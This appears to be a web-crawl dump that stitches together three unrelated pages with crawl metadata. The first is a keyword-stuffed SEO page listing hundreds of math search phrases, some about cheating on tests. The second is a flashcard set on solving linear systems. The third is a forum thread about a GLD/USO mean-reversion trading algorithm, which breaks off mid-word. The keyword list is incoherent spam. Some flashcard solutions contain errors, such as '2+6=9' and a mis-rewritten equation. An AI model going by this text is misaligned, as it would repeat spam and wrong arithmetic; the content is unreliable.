convert mixed number to decimal.\n\nDifference quotient cubed, solve ti89 complex, Mathematics calculater exponent, subtracting exponents on calculator.\n\nSolve algebraic fractions, 6th grade california star test free guide, simplified radical form of square root of 63t^7u^4, MCQs: Mathematics: Matrices, rationalizing denominator, square roots worksheets, conceptual physics answers, simplified radical forms.\n\n8th grade prealgebra conversion charts, Dividing decimals by a decimal worksheets or games, free ti 84 calculator emulator, ALGEBRA CACULATOR, Basic chemistry, book, download, division w/remainder worksheet.\n\nFree Accounting Worksheets, binomial theorem questions, college algebra calculators, easy fun teach coordinate plane free printable.\n\nRadical calculators, synthetic division on ti-84, graphing exponential functions ti-83 plus, Inverse Log Equation, exponential differentiation calculator.\n\nAlgebraic expressions for fifth graders/word problems, free algebrator, EASY STEPS OF ALGEBRA, Simplifying Radical calculator, explanation of simplifying radicals with variables.\n\nMatlab solve for nonlinear equations, free algebrator download, holt algebra 1 answers, Algebra - 8th grade = arithmetic progression =GEOMETRIC PROGRESSION AND HARMONIC PROGRESSION.\n\nHow to find out how to do an algebra problem, (adding and subtracting negative numbers printables), Sample Star Test 9th Grade, matlab solve equation of plane.\n\nCheck a charactor repeats in a string+java+sample codes, how to graph quatradic equations, addition with variables worksheets.\n\nSolving simultaneous equations on a ti-89, Visual Basic.net + MSN like Search sample Program, algerbra problem, fration games, lattice multiplication sheets that print, Second order Differential Equations.\n\nMultiplying Rational Expressions Calculator, rules for least common multiple, algebra equation cheat, Algebra 2 from Saxon math, merrill algebra II, math scales algebra, gnuplot plot polynomial.\n\nSquare equation, prentice-hall, inc- CHAPTER TEST ANSWERS WHAT IS HEAT, clep college algebra test, two great papers, log calculator.\n\nThird grade amth sheets, ti 84 graphical calculator simulator, simplifying radical expressions multiplying fractions, solving systems using addition method calculator, free math worksheets about parabolas, iq question for grade11, algebra 1 michigan math book.\n\nAptitude test question answer, Glencoe Algebra ebook, Linear programming Graphing calculator, graphing calculator online, permutations and combinations high school algebra.\n\nSolving by graph problems, solving 2nd order differential equation, ti 84 plus emulator, steps in dividing monomials, free prealgebra worksheets, use of quadratic equations in real life applications.\n\nFactoring calculator complex, CAT6 released questions+3rd grade, solving log base problems on a ti 89, how to pass algebra quiz.\n\nAlgebra 1/2 third edition saxon answers, cubed roots, solve 2nd order simultaneous equations, STAR test material for 6th grade'.\n\nGRADE 4 LCM GRAPH, free GCSE maths circle theory lesson plan, how to solve algebra equations with fractions, simplifying algebraic expressions involving exponents.\n\nOnline graphing calculator TI, solve rational expressions, maths percentage revision exercise, adding rational expressions powerpoint, maths rearranging.\n\nMath printouts of kids, math multiply/divide fractions, graphing calculator LIMIT, Practice Sats Papers Printable, online factorization, holt middle school math workbook pdf.\n\nONLINE ALGEBRA HELP, mcdougal littell algebra 1 teachers edition chapter 10 test, Science practice tests 7th grade online Virginia, year 8 ks3 maths sats practise do it free online.\n\nHard factoring worksheets, free evaluation expressions worksheets, Write a gui program AND scientific calculator applet, high school algebra homework sheets, ti 83 plus puzzle pack cheats.\n\nConvert decimal to time java, 7th grade plotting functions worksheet, math prealgebra function worksheets.\n\nFree past year O level exam paper, cost accounting past exam paper, expression calculator online, printable worksheets for graphs & coordinates for 10th graders, Finding the Least Common Denominator.\n\nSquare roots of exponents, solving multiple nonlinear equation, holt math practice workbook.\n\nOnline graphing calculators, \"equation Work sheet\", radical fractions, maths free printable worksheets angles.\n\nLowest common denominator calculator, formula to convert decimal to fraction, georgia 7th grade math skills practice worksheets, HARDEST MATHS SUMS, first grade algebra worksheets, integrating factor method on a ti-89.\n\nSample of school applications for grade shcoolers, algebra boole program, Physics worksheet for grade X.\n\n\"simple form\" math \"6th grade\", How to work college algebra problems, iowa algebra sample, multiplying rational expressions problem solver, highest common factor 64 and 27, simplest form online.\n\nExcel worksheet ks3, how to use programs put into TI-83 calculators, convert feet decimal fraction, +exponents lesson plans.\n\nFactoring- programming- ti 83, everyday 8-9 math sheet you can print, biology the dynamics of life chapter review answer key, how to get to the natural base e on a TI-84 Plus, primitive calculaters, completing the square practice sheet.\n\nTI-84 graphing calculator emulator, fraction calculater, worksheet solving fraction equations, graphing functions and input/output table worksheets, free, program to plot hyperbola, inequalities practice problems.\n\nBalancing chemical equations on ti-84, \"ellipse\" + \"excel\" + \"formula\" equation, solving nonlinear equations matlab, Take Free 8 Grade Algebra tests, prentice hall physics lessons.\n\nSquare route caculator, STAR test sample 6th grade tutorials, function worksheet 1st grade, convert x^(2/3) to radical form, free online word problem solver.\n\nFree Algebra Calculator, adding,subtracting,multiplying,and dividing integers test, example of program in java that resolve quadratic root, transformations free worksheets elementary math, cube numbers worksheets.\n\nFraction word problems with common denominator, algebra, c#, solve symbolic nonlinear equation matlab.\n\nAdding and subtracting integers worksheet, marh fraction games, graphing polar coordinates in excel, variables worksheet.\n\nFREE TI 84 PLUS CALCULATOR ONLINE, excel solver for engineers, histogram worksheets for 6th grade, algebra and pre algebra worksheets and answer keys.\n\nGlencoe Mathematics Algebra 1 on matrices, mcgrawhill sample questions for ixth standard, Free F.O.I.L. for dummies in algebra, \"word problems for first grade\", algebrator 4.0, quadratic equations questions and answers, practice worksheets for a 7th grade eog in north carolina.\n\nDifferentiate functions online calculator, elementary algebra.com, how to solve rational expression, multiplicative inverse printable worksheet.\n\nSimple long division worksheet printouts, How do you factor third order equations, louisiana mathematics scott foresman answer key grade 5, conics section worksheets simplify and graph, alge test, how to calculate linear feet?.\n\nHands on equations cheats and answers, algebre 1 part 1tips for passing the class, \"work logarithm problems\".\n\n\"fourth root\" of natural log, answers to glencoe math 8-3 book one enrichment, how do I prepare for the Iowa Algebra Aptitude Test, listing fractions from greatest to least, easy maths printable sheets for 5 years old.\n\nFactoring x^2+bx+c calculator, Algebraic expressions and equations lesson plan, symbolic method, TI factoring rational programs, what is the difference between tools and technology, trinomial factoring cheating calculator, algebra equation answers.\n\nHands on equations examples, subtract roots calculator, Graphing hyperbolas.\n\nHolt algebra answers, college algebra clep test, how to solve operations with radical expressions, Algebra 2 Chapter 9 Resource Book answer key.\n\nMcdougal littel geometry, program quadratic equation into ti-83, +b=sqaure root a+b, excel formula to find root, how to convert rational numbers to mixed numbers, decimal and fractions?, math lesson worksheets positive negative add subtract, reasons for factoring alegra.\n\nPrentice hall fourth edition intermediate algebra for college students, online maths entrance exam for practise, determine ratio algebra, how to cube root on ti calculator, books on graphing linear scales, \"Root locus\" on ti-83.\n\nSolving equations three terms cont, how to cheat with a TI-84+ calculator, simplify cubed square root, pdf to ti-89, solving systems of equations with absolute value, TI-84 emulator, free algebra calculator software.\n\n9 years mathmatics free material, Apply dilations worksheets Middle school math, Getting rid of square roots.\n\nFree Grade 8 math worksheets reflections rotation, free maths exam for high school kids, \"changing difference\" formula, How to Multiply, divide, add, and subtract integers games, free software for graphing algebra.\n\nEntering domains in inequalities + ti-89, \"word problems for first graders\", NTH Term Formula, how to enter a cube root on a TI-83, common denominator worksheets.\n\nHolt math book course1 teachers edition online, 7th grad mathmatics, simplifying radical distance formula, foiling a cube root, iowa test for 9th grade, square root program inputed by user in java.\n\nAdding and subtracting integers workbooks, factor third power trinomial, taks prep workbook holt 10, solving ODE23 using Matlab, inverse equation for percentage, Polynomial factorer, \"Changing fractions to higher\".\n\nOnline math problems solver, downloadable accounting sheets, ti 89 laplace transforms, convert equivalent mixed fractions to decimal number, probability filetype: ppt, how to balance a linear equation, Algebra software.\n\nHow to solve square root operations, square root+rules, subtraction equations worksheet, Balancing Equations Online, online factorer, maths for dummies online.\n\nHack answers algebra, matlab second order runge kutta, Convert Decimal into fraction using a scientific calculator, mcdougal littell tutor, correcting quotients merrill wkst., differential equation calculator, how to find the square root.\n\nAnti-derivative solver, excel fit data linear combination linear equations, easy ways to learn inequalities, printable worksheets factoring polynomials.\n\nHow to do easy addition, rule for adding and subtracting integer, CUBIC BINOMIALS MATH, ks2 algebra games, algerbra expressions formula, solving quadratic equations by the quadratic formula + ti-83 calculator.\n\nHenderson Hasselbach worksheet, calculator with parenthesis and radicals, McDougal Littell Grade 9 TAKS Test, algebra II help university of phoenix, adding and subtracting fractions LCD handouts, squares/square roots solver.\n\nWorksheets with conjugates, adding unlike integers worksheet, 5th grade math free worksheets integers, mcdougal littell math book answer keys, answers to the problems in glencoe precalculus math book, slove all math.\n\nMaths tricks to solve the sums fast, free software for graphing xy slopes, glencoe accounting worksheets, download elementary linear algebra student solution manual 8th edition.\n\nMath wksts with answer sheets (properties of math), polynomial factoring programs for the TI 84, algebraic expressions.ppt, free online inequality graphing.\n\nFactoring methods mathematics polynomials a c method, 9th grade math mcgraw-hill, how to cheat with a TI-84 calculator, 8th grade radicals practice sheet, pre-algebra workbook.\n\nSample Iowa Algebra Aptitude, rdcalc+tutorial, math hungerford solutions abstract.\n\nTi-89 powerpoint integrals, Distributive property to write a polynomial as the product of two factors, nonlinear maple.\n\nPre algebra software, ks3 maths level 3 +4 work sheets, ti 84 calculator online free.\n\nSolve equations 2 variables in excel, Online solver of triangle problems, free 1st grade math worksheets, \"simplifying fraction worksheet\", free polynomial factor calculator, aptitude question and answer papers.\n\nEasy subtracting and adding integers worksheets, worksheets on solving inequalities , even answers for the mcdougal littell online workbook for algebra 1, putting puzzle pack on graphing calculator.\n\nEquation root finder online, long hand square roots for kids, addition problems worksheet, Runge-Kutta method calculators.\n\nQuadratic equation solver TI-83, free test on solving rational equations, solve imaginary quadratic in matlab.\n\nOld sats paper ks3 maths level 6-8, prealgerbra word problems, math equations for interest, trivia about math, general aptitude questions & answers.\n\nQuadratic and linear systems- word problems, lesson plans for pre algebra like terms, decimal to fraction formula.\n\nFourth grade fractions worksheet, prentice hall book answers, identity calculator for math.\n\nComplete the square worksheet, dividing fractions with exponents, plato GED cheat sheet, www. purple math com. steps to do algebra notes simple notes.\n\nTi-89 derivative x power error \"Non-algebraic variable\", Exponential Expression, permutation ks2, solving algebra equations, finding zeros graphically quadratic, completing the square when a is not one worksheet, \"rotation worksheets\" +ks3.\n\nFree online simplifying calculators, online maths paper ks3, simplify the index power of 3/2, calculator-square roots.\n\nTrig calculator, printable ks2 homework sheets, trigonometric identities ti-84 plus program, maths sats simultaneous equations, convert fraction decimal study worksheet taks 7th, 8th grade order of operation math problems.\n\nFree arabic revision online, addition of trig functions, trig worksheets printable, fractions worksheet dowload, aptitude question and answer on english, aptitude question paper.\n\nOklahoma mathematics course 1 book answers 6th grade, adding subtracting multiplying dividing fractions worksheet, merrill math worksheets.com, converting general to vertex form, 6th math test, solving coupled differential equations matlab, mixed factoring completing square.\n\nSimple Algebra Worksheets, virginia answers geometry book glencoe 2004 teachers edition, ti-89 \"partial differential equations\", pre-algebra prentice hall, TI-84 emulator.\n\nBeginning algebra worksheets, 8th grade free worksheets, permutations and combinations, interesting powerpoint, high school, online math problem solver, solving 2-step equations worksheet, graphing inequalities online calculator.\n\nComplex factoring, solve radical expressions, mixed number conversion 3rd grade fractions, word problems ks2 worksheets, the hardest math problem in the world.\n\nBinary+numeracy, Matric calculator, download aptitude test paper, rules for completing basic algebra problems, step by step algebra 2 help, math factorial expressions cheat sheet.\n\nFactorising algebraic identities, solving complex matrices in ti 89, google G E D +divison math free, basic law of probability,middle school, holt algebra 1 workbook answers, cube root button on calculator, lesson plans on exponents.\n\nWhat is the least common denominator of four ninths and thirteen sevenths, activity on square roots, summation solver, lessons for ratios and proportions for 4th grade, \"pre algebra 3rd grade books\", \"mathmatical poem\", cube root of a variable and exponent.\n\n6th grade pre-algebra lesson plans, mcdougal littell houghton mixed review taks objective, geometry practice tests online games for 9th grade.\n\nOnline law of exponents solver, how to solve multiplication exponentials, 8th grade Pre-algebra practice sites for students, simplifying radical functions, Free Printable Algebra Worksheets.\n\nMultiplying integer worksheet, simplifying radicals on the ti-89, Symmetry Math Printable Worksheets Kids, Simplifying Radical involving variables.\n\nHelp with 5th grade midyear math test, worksheets linear funciton, glencoe algebra book online, java write a method to determine if an integer that is passed to it is a prime, Free Algebra Problem Solving, grade 10 quadratic practise, algebra equations answers.\n\nFree grade 1 introducing multiplication using arrays worksheets, statistics Ti-83 download, ratio worksheets for kids, arithmatic problem, evaluating radical equations calculator, solving inequalities by multiplying or dividing worksheet and answers.\n\nTI 89 Instructions GCF, printable slope worksheets, programs for T I calculators solving a system with three variables.\n\nFactoring cubed roots expressions, square root properties addition, math equations percentages.\n\nCost accounting formula for excel, converting mixed numbers into decimals, 6th grade logic books root words, free probability worksheets, factor trinomials calculator, free online calculator with fraction key.\n\nLcm color worksheets, methods of solving second order differential equations, Prentice Hall Pre-Algebra answers, solving equations using distributive property, Sample Elementary Algebra Worksheets, printable woprksheets for calculating areas and perimeters.\n\nMatlab powell hybrid, HOW TO SOLVE OR GET THE LCM??, how to multiply powers roots and radical numbers.\n\n10th grade integer worksheet, \"pre-algebra\" + \"sixth grade\", factoring out the GCF worksheet.\n\nGcse 'word problems' learning to work out equations using algebraic methods, free test prep for NC 8th grade EOG for math, math websites 9th grade.\n\nLesson Plans + VA + SOL +6th Grade + Math + Circles, free algebra questions with solutions, ti-84 silver edition download simplify square root, changing value to fraction in formula, free printable worksheets LCM & GCF, graphing the solution set calculator, integers positive negative addition printable worksheet.\n\nTi84 free online use, math homework sheets for holt math, how to convert to mix number, Presentations on numerical method with matlab, proportions radical expressions to simplify.\n\nReal life 6th grade examples, freeworksheets on ratio and proportions, ks3 algebra online activities.\n\nFree math worksheets+mean,median,mode, Algebra Substitution Method, casio online T1-89 calculator, algebra made easy how to graph inequalities, objective 2 holt mathematics.\n\nAlgebra 2 equation solver, TI-83 factorial formula instructions, graph of rational functions, inverse and joint variation, mcdougal littel math practice workbook ansewrs, multiplying fractions solver, third grade fraction practice reproducables.\n\nFree math printables for sixth grade, online math solver equation of ellipse, 2-step equations calculator, factoring printable activities, free ratio ks3 worksheets, equations with like terms.\n\nMath book 8th class free, sample algebra for children, CLEP Algebra exam guide, math tests from past sats papers, foil calculator+ factoring.\n\nSimplify basic radicals worksheets answers, algebra work problem examples, Graphing Pictures with Algebra, how to make printable, labeled fraction pieces, year 10 printable homework sheets, factoring expressions practice questions.\n\nLinear equations 5th grade, order of operations online calculator, glencoe/mcgraw-hill algebra 1 answer book.\n\nFactoring + word problems, adding and subtracting multiple integers, help with ks2 algebra, probability homework help 6th grade.\n\n9th grade algebra worksheets, Ellipse equation solver, Simplifying Radical Expressions 11-1 lesson tutorial.\n\nCognitive mathematic trygonometry or calculus, solving systems of linear equations n three variables, california star 6th grade math practice test sample, square root fifth grade, lowest common donominator, \"dependent linear equations\" algebra, how to solve decimal numbers.\n\nEbooks for apptitude only free for download, second order ode solver, logarithm worksheet algebra 2.\n\nCoordinate plane printouts, expression solver with negative exponents, free pre algebra program study.\n\nConvert to number with decimal places, tricks to taks, solving equations for a specified variable.\n\nQuadratic factoring calculator, graphing quadratic inequalities interactive lesson plans, maple solve, simplify the square root, Free PDF Books on Principales of Accounting.\n\nHow to multiply rational expression caculator, printouts of 6th grade algebra, how to add, subtract, mulyiply and divide rational expressions, how do you use a casio calculator.\n\nSkills practice workbook, free online ti 84 calculator, matrix + multiple variables + non-linear.\n\nFractions & decimals formula, download test on grade 8 math north carolina, free solving algebraic expressions, mcdougall littell answers, how to solve high school linear programming examples.\n\nKs3 mathmatical games, online polar graphing calculator, answers on pg 176 on algebra with pizzazz, Factor out the Greatest Common Factor calculator, linear combination worksheet.\n\nMcGraw Hill algebra 2 cheat, subtraction of integers, inventor of the quadratic formula, shortcut to find least common denominator.\n\nSimplified radical form, calculator roms downloads, writing linear equation, TI-84 summation, Trignometry exercises for Year 10, practic question for algebra.\n\nCommon math eroors in high school stdents, finite math for dummies, algebra for idiots, algebraic simplification of formulas mathematics, solving linear equation by addition, PAST KS3 EXAM PAPERS, FREE DOWNLOAD, online graphing calculator parabolas.\n\nHow non linear partial differential equation can be solved by using Matlab, past 6th grade NC EOG tests, key maths answers to sheet 13:2 equations ks3 year 7, properties of math worksheet.\n\nMath apptitude questions, adding, multiplying exponents lesson plan, sample final exam chapter 1-9 cpm algebra connection, summation notation instruction ti 83, how to binomial theorem on hp 83 calculator, simple algebraic questions.\n\nLCM graphs FOR CHILDREN, algebra entrance exam chicago, graph logarithmic quadratic, factoring algebra worksheets and games, algebra fifth grade powerpoint, signed numbers worksheet, answers to Glencoe Algebra 1 practice workbook.\n\nRational exponents explanation, inequality worksheets, Prentice Hall Mathematics Pre-Algebra Answers.\n\nBing visitors found us yesterday by using these algebra terms:" ]
[ null, "https://softmath.com/r-solver/images/tutor.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7868375,"math_prob":0.98990166,"size":58186,"snap":"2020-45-2020-50","text_gpt3_token_len":12382,"char_repetition_ratio":0.23007116,"word_repetition_ratio":0.0040949057,"special_character_ratio":0.19009727,"punctuation_ratio":0.14131941,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9998648,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-11-24T13:05:53Z\",\"WARC-Record-ID\":\"<urn:uuid:7e5a0915-1965-4e0c-b223-ed8c0582d86e>\",\"Content-Length\":\"121059\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ce9fbe76-0782-4b42-9eb5-7d193e15ce30>\",\"WARC-Concurrent-To\":\"<urn:uuid:28d6394a-ef6b-4b2c-a8a3-5b606222b0a6>\",\"WARC-IP-Address\":\"52.43.142.96\",\"WARC-Target-URI\":\"https://softmath.com/math-com-calculator/solving-a-triangle/free-accounting-exercises.html\",\"WARC-Payload-Digest\":\"sha1:AMGKYG7AR4NBASOOSH4OXFRBBXQBG27R\",\"WARC-Block-Digest\":\"sha1:SPZODXGUJD7HXVRHNKXDMKB3EGZYKYK3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141176256.21_warc_CC-MAIN-20201124111924-20201124141924-00105.warc.gz\"}"}
https://www.studystack.com/flashcard-2151117
[ "Save", null, "or", null, "or", null, "taken", null, "Make sure to remember your password. If you forget it there is no way for StudyStack to send you a reset link. You would need to create a new account.\n\nfocusNode\nDidn't know it?\nclick below\n\nKnew it?\nclick below\nDon't Know\nRemaining cards (0)\nKnow\n0:00\nEmbed Code - If you would like this activity on your web page, copy the script below and paste it into your web page.\n\nNormal Size     Small Size show me how\n\n# Module 5 - Linear Eq\n\n### Math 113 Online: Module 5 - Linear Equations and Substitution Method\n\nDetermine whether each ordered pair is a solution of the system of linear equations. {x+y=8 and 3x+4y=29 a) (2,6) b) (3,5) Plug in each ordered pair into both equations to determine if said ordered pairs are solutions to the linear equations. 2+6=9; 3(2)+4(6)=29/6+24=30 and 3+5=8; 3(3)+4(5)=29/9+20=29. Ordered pair a isn't a solution, but pair b is.\nSolve the System of linear equations by graphing. {x+y=9 and x-y=5 Once you've graphed both equations, find the point at which both lines intersect. The ordered pair should satisfy the equations. The solution of the system is (7,2) because it completes both linear equations. 7+2=9;7-2=5\nWithout​ graphing, decide. a) Are the graphs of the equations identical​ lines, parallel​ lines, or lines intersecting at a single​ point? and b) How many solutions does the system​ have? {9x+7=27 and x+8y=8 Rewrite both equations in slope intercept form y=-9+27 and y=-1/8x+1. Identify the slopes and y-intercepts for both lines. The slopes for the lines are -9 and -1/8. The slopes are different, and must intersect at one point; meaning one solution.\nSolve the system of equations using the substitution method. {x+y=10 and x=4y The first step is to solve one of the equations for one variable. The second equation; x=4y has already been solved for x, so we'll use it. 4y+y=10 (Combine like terms) 5y=10; y=2 x=4(2); x=8. So the solution is (8,2)\nSolve the system of equations by the substitution method. {y=5x+7 and y=7x+8 Substitute 5x+7 for y in the 2 equation. 5x+7=7x+8 isolate the x terms on the left side by subtracting 7x and adding 7. -2x=1; x=-1/2 Plug in x for the 1st equation. y=5(-1/2)+7; y=-5/2+7. Simplify. y=9/2 So the ordered pair is (-1/2,9/2)\nSolve the system of equations by the substitution method. {12x+3y=8 and -4x=y+8 Neither equation is solved for x or y, so we'll isolate y on the right side of equation 2. -4x-8=y Now fill in the 1st equation 12x+3(-4x-8)=8 Use the distributive property on the left side. 12x-12x-24=8 -24=8 is a false statement/no solution.\nSolve the system of equations by the substitution method. {4x-y=3 and 5x-2y=12 Neither is solved, so we'll isolate y in the 1st equation. -y=3-4x Solve for y y=4x-3 Now substitute y in the 2nd equation. 5x-2(4x-3)=12 Distributive property. 5x-8x+6=12; -3x+6=12, isolate x. -3x=6, solve for x, x=-2. Replace x in the first equation.\nSolve the system of equations by the substitution method. {4x-y=3 and 5x-2y=12 (Continued) y=4(-2)-3, y=-8-3, y=-11. So the ordered pair is (-2,-11)\nSolve the system of equations by the substitution method. {3x+12y=15 and 4x+18y=22 Neither is solved, so we'll isolate x in the 1st equation. 3x=15-12y, solve for x. x=5-4y, now substitute x in the 2nd equation. 4(5-4y)+18y=22 Distribute. 20-16y+18y=22, combine like terms. 20+2y=22 isolate y on the left side. 2y=2; y=1\nSolve the system of equations by the substitution method. {3x+12y=15 and 4x+18y=22 (Continued) Replace y in the first equation. x=5-4(1) Solve. x=1 So the ordered pair is (1,1)\nCreated by: 1118006241566176\n\nVoices\n\nUse these flashcards to help memorize information. Look at the large card and try to recall what is on the other side. Then click the card to flip it. If you knew the answer, click the green Know box. Otherwise, click the red Don't know box.\n\nWhen you've placed seven or more cards in the Don't know box, click \"retry\" to try those cards again.\n\nIf you've accidentally put the card in the wrong box, just click on the card to take it out of the box.\n\nYou can also use your keyboard to move the cards as follows:\n\n• SPACEBAR - flip the current card\n• LEFT ARROW - move card to the Don't know pile\n• RIGHT ARROW - move card to Know pile\n• BACKSPACE - undo the previous action\n\nIf you are logged in to your account, this website will remember which cards you know and don't know so that they are in the same box the next time you log in.\n\nWhen you need a break, try one of the other activities listed below the flashcards like Matching, Snowman, or Hungry Bug. Although it may feel like you're playing a game, your brain is still making more connections with the information to help you out.\n\nTo see how well you know the information, try the Quiz or Test activity.\n\nPass complete!\n \"Know\" box contains: Time elapsed: Retries:\nrestart all cards" ]
[ null, "https://sstk.biz/images/studystacklogo.svg", null, "https://sstk.biz/images/blackeye.png", null, "https://sstk.biz/images/greenCheckMark.svg", null, "https://sstk.biz/images/blackeye.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8504432,"math_prob":0.987038,"size":3190,"snap":"2023-40-2023-50","text_gpt3_token_len":1098,"char_repetition_ratio":0.1839297,"word_repetition_ratio":0.1015625,"special_character_ratio":0.34043887,"punctuation_ratio":0.11303192,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99916553,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-10T00:47:24Z\",\"WARC-Record-ID\":\"<urn:uuid:0f2bdd9b-5f58-4316-b8d9-dbf20c4eb21b>\",\"Content-Length\":\"77976\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:00e0b2e4-0767-4732-bda6-671c6853fb69>\",\"WARC-Concurrent-To\":\"<urn:uuid:23ad35f9-52cb-43ed-acb3-408a8e41cd7a>\",\"WARC-IP-Address\":\"69.89.15.53\",\"WARC-Target-URI\":\"https://www.studystack.com/flashcard-2151117\",\"WARC-Payload-Digest\":\"sha1:RT3LPV3ET3U7AJPKSTOQ5Z5BBPOSS4WH\",\"WARC-Block-Digest\":\"sha1:RQ74H3RPVDBUVYYLHP3QNTX47RM5UMXH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100989.75_warc_CC-MAIN-20231209233632-20231210023632-00173.warc.gz\"}"}
https://www.quantopian.com/posts/help-for-a-newby-mean-reversion
[ "Help for a newby (mean reversion)\n\nI very new to this, and I've written this (my first) mean reversion algo which calculates a hedge ratio using linear regression between USO and GLD and then buys/sells depending on the deviation of the portfolio price from the mean. It hasn't turned out very well, unsurprisingly, and the results vary wildly depending on what I set as the lookback period. I was wondering if anyone could point out if I have fundamentally misunderstood how this strategy works. Pointers on my terrible, terrible code would also be appreciated.\n\n4\nTotal Returns\n--\nAlpha\n--\nBeta\n--\nSharpe\n--\nSortino\n--\nMax Drawdown\n--\nBenchmark Returns\n--\nVolatility\n--\n Returns 1 Month 3 Month 6 Month 12 Month\n Alpha 1 Month 3 Month 6 Month 12 Month\n Beta 1 Month 3 Month 6 Month 12 Month\n Sharpe 1 Month 3 Month 6 Month 12 Month\n Sortino 1 Month 3 Month 6 Month 12 Month\n Volatility 1 Month 3 Month 6 Month 12 Month\n Max Drawdown 1 Month 3 Month 6 Month 12 Month\nimport pandas as pd\nimport numpy as np\nfrom pandas.stats.api import ols\n\ndef initialize(context):\n\n#trading only GLD and USO ETfs\ncontext.securities = symbols('GLD', 'USO')\n\n#pretty arbitrary lookback for moving mean and std of portfolio price\ncontext.lookback = 10\n\n#to track portfolio price\ncontext.yPort = []\n\n# Rebalance every day, 1 hour after market open.\nschedule_function(my_rebalance, date_rules.every_day(), time_rules.market_close(minutes = 10))\n\n# Record tracking variables at the end of each day.\nschedule_function(my_record_vars, date_rules.every_day(), time_rules.market_close())\n\nlb = context.lookback\n\n#ETF recent prices\nx = data.history(symbol('GLD'), 'close', lb, '1d')\ny = data.history(symbol('USO'), 'close', lb, '1d')\n\n#linear regression to get hedge ratio (coffeccient of x)\ndf = pd.DataFrame({'GLD':x, 'USO':y})\n\nres = ols(y=df['USO'], x=df['GLD'])\n\ncontext.hr = res.beta['x']\n\ndef my_rebalance(context,data):\nlb = context.lookback\n\n#get current ETF prices at near end of day\nx = data.current(symbol('GLD'), 'price')\ny = data.current(symbol('USO'), 'price')\n\n#price of unit portfolio\nport = y - context.hr*x\n\n#keep track of portfolio prices\ncontext.yPort.append(port)\n\n#only need previous lookback number of prices\nif len(context.yPort) > lb + 1:\ncontext.yPort = context.yPort[1::]\n\n#after enough portfolio prices have been determined\nif len(context.yPort) == lb + 1:\n#moving average and std of portfolio prices\nma = np.mean(context.yPort[:lb])\nms = np.std(context.yPort[:lb])\n\n#Z-score of current portfolio value\nz = (port - ma)/ms\n\n#order ETFs depending on current hedge ratio and multiplied by Z-score, pumped up by an arbitrary factor\norder_target_value(symbol('GLD'), 10000*z*context.hr*x)\norder_target_value(symbol('USO'), -10000*z*y)\n\ndef my_record_vars(context, data):\nrecord(leverage = context.account.leverage)\nrecord(hedgeRatio = context.hr)\n\n\nThere was a runtime error.\n7 responses\n\nSome changes I've made, which seem to help reduce the volatility and drawdown:\n- order on market open, using yesterday's close data (I guessed more liquidity is better than trying to predict the close)\n- compare current day's closing price to moving average of last 10 days including itself (this should improve accuracy)\n- grow position size as portfolio grows (instead of fixed position sizing)\n\n6\nTotal Returns\n--\nAlpha\n--\nBeta\n--\nSharpe\n--\nSortino\n--\nMax Drawdown\n--\nBenchmark Returns\n--\nVolatility\n--\n Returns 1 Month 3 Month 6 Month 12 Month\n Alpha 1 Month 3 Month 6 Month 12 Month\n Beta 1 Month 3 Month 6 Month 12 Month\n Sharpe 1 Month 3 Month 6 Month 12 Month\n Sortino 1 Month 3 Month 6 Month 12 Month\n Volatility 1 Month 3 Month 6 Month 12 Month\n Max Drawdown 1 Month 3 Month 6 Month 12 Month\nimport pandas as pd\nimport numpy as np\nfrom pandas.stats.api import ols\n\ndef initialize(context):\n\n#trading only GLD and USO ETfs\ncontext.securities = symbols('GLD', 'USO')\n\n#pretty arbitrary lookback for moving mean and std of portfolio price\ncontext.lookback = 10\n\n#to track portfolio price\ncontext.yPort = []\n\n# Rebalance every day, 1 hour after market open.\nschedule_function(my_rebalance, date_rules.every_day(), time_rules.market_open())\n\n# Record tracking variables at the end of each day.\nschedule_function(my_record_vars, date_rules.every_day(), time_rules.market_close())\n\nlb = context.lookback\n\n#ETF recent prices\nx = data.history(symbol('GLD'), 'close', lb, '1d')\ny = data.history(symbol('USO'), 'close', lb, '1d')\n\n#linear regression to get hedge ratio (coffeccient of x)\ndf = pd.DataFrame({'GLD':x, 'USO':y})\n\nres = ols(y=df['USO'], x=df['GLD'])\n\ncontext.hr = res.beta['x']\n\n#price of unit portfolio\nport = y[-1] - context.hr*x[-1]\ncontext.port = port\ncontext.x = x[-1]\ncontext.y = y[-1]\n\n#keep track of portfolio prices\ncontext.yPort.append(port)\n\ncontext.z = 0\n\n#only need previous lookback number of prices\nif len(context.yPort) >= lb:\ncontext.yPort = context.yPort[-lb:]\n\nma = np.mean(context.yPort)\nms = np.std(context.yPort)\n\n#Z-score of current portfolio value\ncontext.z = (port - ma)/ms\n\ndef my_rebalance(context,data):\n\nz = context.z\ny = context.y\nx = context.x\nacc = context.portfolio.portfolio_value\n#order ETFs depending on current hedge ratio and multiplied by Z-score, pumped up by an arbitrary factor\norder_target_value(symbol('GLD'), acc*z/100*context.hr*x)\norder_target_value(symbol('USO'), -acc*z/100*y)\n#order_target_value(symbol('GLD'), 10000*z*context.hr*x)\n#order_target_value(symbol('USO'), -10000*z*y)\n\ndef my_record_vars(context, data):\n#record(leverage = context.account.leverage)\n#record(hedgeRatio = context.hr)\nrecord(port=context.port)\n\n\nThere was a runtime error.\n\nAlso I was wondering if you actually need two lookback periods. One is for establishing the hedge ratio. If it's relatively stable this could be longer than the current 10 days. The other is for establishing direction of mean reversion. This will be related to the half life of mean reversion, and may vary. I believe it's an output of OLS?\n\nUpdate: the half life of mean reversion can be worked out from the auto-correlation slope. In other words the beta of the series returns regressed on lagged version of itself. Ernie Chan gives the matlab code in his book.\n\nFound 